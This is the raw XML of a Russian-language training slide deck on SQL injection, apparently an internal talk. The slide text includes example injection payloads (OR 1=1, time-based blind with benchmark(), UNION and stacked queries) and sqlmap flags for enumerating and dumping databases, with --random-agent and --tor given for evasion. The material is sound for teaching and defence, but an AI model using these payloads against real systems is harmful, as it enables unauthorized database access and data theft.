                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Пример: Update users SET pass = ‘1’ where user = ‘t1’ OR 1=1--’</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="222222"/>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800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Blind SQL Injection (слепое внедрение операторов SQL)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>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800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Пример: select * from table where id = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>AND  </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    if((a scii(lower(substring((select</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    user()),$i,1)))))!=$s,1,benchmark(1000,md5())))</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Особенности эксплуатации для разных СУБД</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>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800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Пример(MySQL):SELECT* from table where id =1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>union select 1,2,3</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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600">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	Пример(PostgreSQL):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT* from table where id =1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>; select 1,2,3</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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Effect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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7" st="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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8" st="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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9" st="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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0" st="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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1" st="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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2" st="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="366">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descr="2.JPG" id="69" name="Shape 69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 70"/>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ru" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>В evo.company входят такие проекты:</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Выделение_001.png" id="72" name="Shape 72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574821" y="3236496"/>
            <a:ext cx="4496401" cy="824025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Asset 2.png" id="73" name="Shape 73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984575" y="2856100"/>
            <a:ext cx="1179975" cy="335600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="7910" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3175325" y="2681812"/>
            <a:ext cx="1532700" cy="668538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Shape 75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4713849" y="2704347"/>
            <a:ext cx="1518175" cy="633353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188875" y="2709576"/>
            <a:ext cx="1455125" cy="628125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="358401206_w200_h200_logo.png" id="77" name="Shape 77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761930" y="4185525"/>
            <a:ext cx="517546" cy="470100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screenshot_3.png" id="78" name="Shape 78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3853851" y="4046750"/>
            <a:ext cx="1518176" cy="759098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="1777187.png" id="79" name="Shape 79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="1222488"/>
            <a:ext cx="2586625" cy="1293313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screen Shot 2017-10-20 at 9.59.27 AM.png" id="80" name="Shape 80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5031" r="3652" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5769025" y="4185525"/>
            <a:ext cx="1386325" cy="466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372" name="Shape 372"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>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4" name="Shape 37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Поиск SQL injection -&gt; SQLmap</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Screenshot_7.jpg" id="375" name="Shape 375"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="536175" y="2103300"/>
            <a:ext cx="2817600" cy="1132850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447025" y="1535475"/>
            <a:ext cx="5614200" cy="3111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ru" sz="2400"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>это инструмент с открытым исходным кодом для тестирования на проникновение, который автоматизирует процесс выявления и эксплуатирования уязвимостей SQL-инъекций и захват серверов баз данных.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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382" name="Shape 382"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>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4" name="Shape 38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Работа с SQLmap</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385" name="Shape 385"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675125" y="901025"/>
            <a:ext cx="8364000" cy="423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-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> для указания URL</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--random-agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>для снижения подозрительной активности</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-tor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> для использования защищенного канала</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--dbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> смотрим какие базы доступны</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--table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> смотрим таблицу</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--columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> смотрим колонки</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rPr b="1" lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>--dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> скачиваем путь к базе</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t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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5" st="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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7" st="7"/>
